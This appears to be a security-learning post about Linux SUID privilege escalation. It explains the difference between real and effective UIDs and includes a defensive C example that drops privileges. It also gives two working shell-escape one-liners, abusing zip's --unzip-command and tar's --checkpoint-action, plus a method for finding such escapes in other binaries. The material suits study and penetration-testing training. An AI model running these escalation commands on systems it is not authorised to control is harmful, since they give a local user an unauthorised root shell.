🛠️ The Mechanics: RUID vs. EUID
When you execute a SUID binary, two things happen:
- Real UID (RUID): Stays as your normal user (e.g., 1001). This is who you actually are.
- Effective UID (EUID): Switches to the file owner (e.g., 0/Root). This is the power the system checks when you try to read /etc/shadow.
Understanding this gap is key to knowing why a shell spawned from an SUID process becomes a Root Shell: the child process inherits the EUID, not the RUID.
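As an added illustration (not code from the original post), a small C program that reads both identities, reports whether the RUID/EUID gap exists, and closes it the way a correctly written SUID program must before it spawns anything, so a child shell cannot inherit root:

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* The two identities the kernel tracks per process: the article's RUID and EUID. */
struct ids { uid_t ruid; uid_t euid; };

struct ids current_ids(void) {
    struct ids id = { getuid(), geteuid() };
    return id;
}

/* 1 when the process holds more authority than the user who started it:
   exactly the gap that lets a spawned shell run as root. */
int has_privilege_gap(void) {
    return getuid() != geteuid();
}

/* Close the gap before any system()/exec(): setuid() called while EUID is 0
   resets real, effective and saved UIDs together, so root cannot be regained.
   Returns 0 on success, -1 if the drop failed or was only partial. */
int drop_privileges_permanently(void) {
    uid_t ruid = getuid();
    if (setuid(ruid) != 0) return -1;
    if (has_privilege_gap()) return -1;          /* never assume the drop worked */
    if (ruid != 0 && setuid(0) == 0) return -1;  /* regaining root must now fail */
    return 0;
}

int main(void) {
    struct ids id = current_ids();
    printf("before: ruid=%u euid=%u gap=%d\n",
           (unsigned)id.ruid, (unsigned)id.euid, has_privilege_gap());
    if (drop_privileges_permanently() != 0) { perror("drop failed"); return 1; }
    id = current_ids();
    printf("after:  ruid=%u euid=%u gap=%d\n",
           (unsigned)id.ruid, (unsigned)id.euid, has_privilege_gap());
    /* Only at this point is it safe to run a sub-process: it inherits the real user. */
    return 0;
}
```

Run as an ordinary user both lines show the same UID; installed SUID-root (chown root, chmod u+s) the first line shows the gap and the second shows it closed.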
🔓 Beyond the Basics: Exploiting Complex Binaries
We often talk about find or vim, but today I audited tools that aren't obviously dangerous:
1. The zip Escape
The zip utility has a test feature (-T) that verifies the archive after creation, and --unzip-command lets you specify the command it uses for that test.
The Exploit:
zip exploit.zip /etc/hosts -T --unzip-command="sh -c /bin/sh"
2. The tar Checkpoint
tar can execute a command at specific "checkpoints" during the archiving process via --checkpoint-action.
The Exploit:
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
🕵️‍♂️ The Researcher's Workflow
When I encounter a binary that isn't on a standard cheat sheet, I use this workflow:
- strings <binary>: Look for calls to system, exec, or sh.
- man <binary>: Search for terms like "command", "program", or "shell".
- Check for interactive modes that might allow shell escapes (e.g., !sh).
Follow my journey: #1HourADayJourney